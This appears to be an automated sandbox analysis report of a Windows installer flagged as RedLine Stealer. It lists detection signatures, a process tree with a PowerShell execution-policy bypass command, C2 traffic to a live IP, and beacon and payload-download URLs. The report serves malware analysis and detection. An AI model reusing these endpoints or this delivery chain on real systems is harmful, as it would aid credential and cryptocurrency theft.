Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Analysis ID: 1294691
MD5: 19124312cafa0b1c5524329755a5d6a2
SHA1: ccd8c01b210b26cd708a3e4cc49de45fed9abac1
SHA256: 0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
Tags: exe

Detection

RedLine
Score: 50
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected MalDoc
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Bypasses PowerShell execution policy
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe (PID: 7528 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe MD5: 19124312CAFA0B1C5524329755A5D6A2)
    • msiexec.exe (PID: 7736 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 " MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 7632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7684 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 7976 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
C:\Windows\Installer\6766e2.msi | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |
C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security |

No Sigma rule has matched
Timestamp | Source | Destination | SID | Protocol | Classtype
08/21/23-19:35:51.013900 | 192.168.2.3:49736 | 45.135.232.24:9878 | 2046105 | TCP | A Network Trojan was detected
08/21/23-19:35:51.481894 | 192.168.2.3:49737 | 45.135.232.24:9878 | 2046045 | TCP | A Network Trojan was detected
08/21/23-19:35:54.924171 | 45.135.232.24:9878 | 192.168.2.3:49737 | 2046056 | TCP | A Network Trojan was detected
08/21/23-19:35:51.013900 | 192.168.2.3:49736 | 45.135.232.24:9878 | 2046045 | TCP | A Network Trojan was detected
08/21/23-19:35:54.854691 | 192.168.2.3:49737 | 45.135.232.24:9878 | 2046105 | TCP | A Network Trojan was detected

AV Detection

Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | ReversingLabs: Detection: 13%
Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49735 version: TLS 1.0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: certificate valid
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004927F0 ReadFile,FindFirstFileW,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0046C9A0 FindFirstFileW,GetLastError,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0046C040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0046E270 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004B08C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0047AB40 FindFirstFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0049CDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003711B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0049D1D0 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00451410 FindFirstFileW,FindNextFileW,FindClose

Networking

Source: Yara match | File source: C:\Windows\Installer\6766e2.msi, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, type: DROPPED
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49736 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49736 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49737 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49737 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 45.135.232.24:9878 -> 192.168.2.3:49737
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1  Host: prkl-ads.ru  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1  Host: prkl-ads.ru
Source: global traffic | HTTP traffic detected: GET /?status=install HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1  Host: prkl-ads.ru
Source: Joe Sandbox View | ASN Name: ASBAXETNRU ASBAXETNRU
Source: global traffic | TCP traffic: 192.168.2.3:49747 -> 45.135.232.24:9878
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | String found in binary or memory: http://.css
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | String found in binary or memory: http://.jpg
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-RSA-Q
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000003.382384474.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.382588413.0000000007A03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m2
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr | String found in binary or memory: http://crls.ssl.co
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigniP
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.ado/1
Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.cobj
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | String found in binary or memory: http://ocsps.ssl.com0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.dr | String found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net/test/build.jpg
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.dr | String found in binary or memory: https://prkl-ads.ru/?status=start&av=$displayNamesString
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.dr | String found in binary or memory: https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: https://www.advancedinstaller.com
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | String found in binary or memory: https://www.ssl.com/repository0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown | DNS traffic detected: queries for: prkl-ads.ru
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 45.135.232.24
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.368260539.00000000005A8000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: JFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | String found in binary or memory: UFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004867F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004AAC30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0037E230
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0037C363
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0053839A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0044C450
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003884B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0052869E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00354772
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00506840
